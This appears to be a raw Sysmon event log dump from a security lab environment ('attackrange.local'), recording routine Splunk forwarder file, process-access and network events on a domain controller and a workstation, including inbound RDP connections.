09:26:28.182{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54294-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001057470Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:31.850{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9C4FAE8C1383C3A037AB9E5CA705DA6C,SHA256=609B00C194CC7BD265BC3B593448F1B94F1A3D0E157D1AB6A2D2E12B6A9EBAF5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001057469Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:31.678{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8E47-6151-CD00-00000000FD01}5996C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057468Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:31.678{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057467Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:31.678{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057466Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:31.678{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057465Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:31.678{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057464Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:31.678{5EBD8912-8CBD-6151-0500-00000000FD01}416500C:\Windows\system32\csrss.exe{5EBD8912-8E47-6151-CD00-00000000FD01}5996C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001057463Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:31.678{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8E47-6151-CD00-00000000FD01}5996C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001057462Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:31.679{5EBD8912-8E47-6151-CD00-00000000FD01}5996C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001057461Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:31.209{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20905485323B44F2BE255D0EEEF338BE,SHA256=08E76C8ADDDDD42E16E1A8E825DBD1E50CD44D316C80D519734F83BB65973004,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981862Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:31.960{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=28D8D379B1CE31E03C466DE84A8E19BC,SHA256=EEE9920969BDF701EEAF3D313A285C6CE911F9FC7D9FD371127CCA2D359DE0EF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057460Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:29.651{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local54295-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 354300x80000000000000001057459Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:29.651{5EBD8912-8CD0-6151-2800-00000000FD01}2200C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local54295-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 10341000x80000000000000001057458Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:31.006{5EBD8912-8E46-6151-CC00-00000000FD01}53644548C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001057471Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:32.209{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5C706F872FAE404B62A8B17C5A7176D,SHA256=8988D015815104B5E4055529E2CCFE942723E0E60E92976DE989C432B0D8221C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981865Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:32.663{69CF5F33-7F28-614D-1200-00000000FD01}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=A768B6463034E76DD9B648BCDA2732EF,SHA256=CA80E1273ACAADFF03F26AAEF12A20E69B7DD113A8FBEC53862F1F5319C5CD69,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981864Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:32.194{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05C4BF2DC0EB062D1DE5AB0EDF690233,SHA256=414AFE0ECB2D870507AF9AE6624515F697D1CA4B08DF3547CBF86485707662B5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981863Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:29.169{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.3.202.198-55192-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000981867Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:33.413{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=15D1A87F3BB92753B01E14DA0E60B9A1,SHA256=204EC2D7B43C958F1442A13C18A9B7FBACF17D292A43DF1A314A752EF44EBE27,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001057481Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:33.334{5EBD8912-8E49-6151-CE00-00000000FD01}53845376C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001057480Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:33.209{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F59DC4E7BBD79DB8E4515C5B6B48F52,SHA256=5AFDFE6AC0BF889779A690AA856D145280C59F2D0FE04944993C355038345F56,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001057479Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:33.178{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8E49-6151-CE00-00000000FD01}5384C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057478Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:33.178{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057477Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:33.178{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057476Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:33.178{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057475Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:33.178{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057474Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:33.178{5EBD8912-8CBD-6151-0500-00000000FD01}416500C:\Windows\system32\csrss.exe{5EBD8912-8E49-6151-CE00-00000000FD01}5384C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001057473Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:33.178{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8E49-6151-CE00-00000000FD01}5384C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001057472Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:33.179{5EBD8912-8E49-6151-CE00-00000000FD01}5384C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000981866Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:29.929{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse173.212.238.118vmi632111.contaboserver.net50922-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000981868Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:34.647{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D9FA6FAE28E7BB44A498DC011C21734,SHA256=DF9147A7F5C9258258D25EF58E4FC0635E843BBFECBD0C5267EE1714AD803C3F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001057501Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:34.928{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8E4A-6151-D000-00000000FD01}5416C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057500Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:34.928{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057499Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:34.928{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057498Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 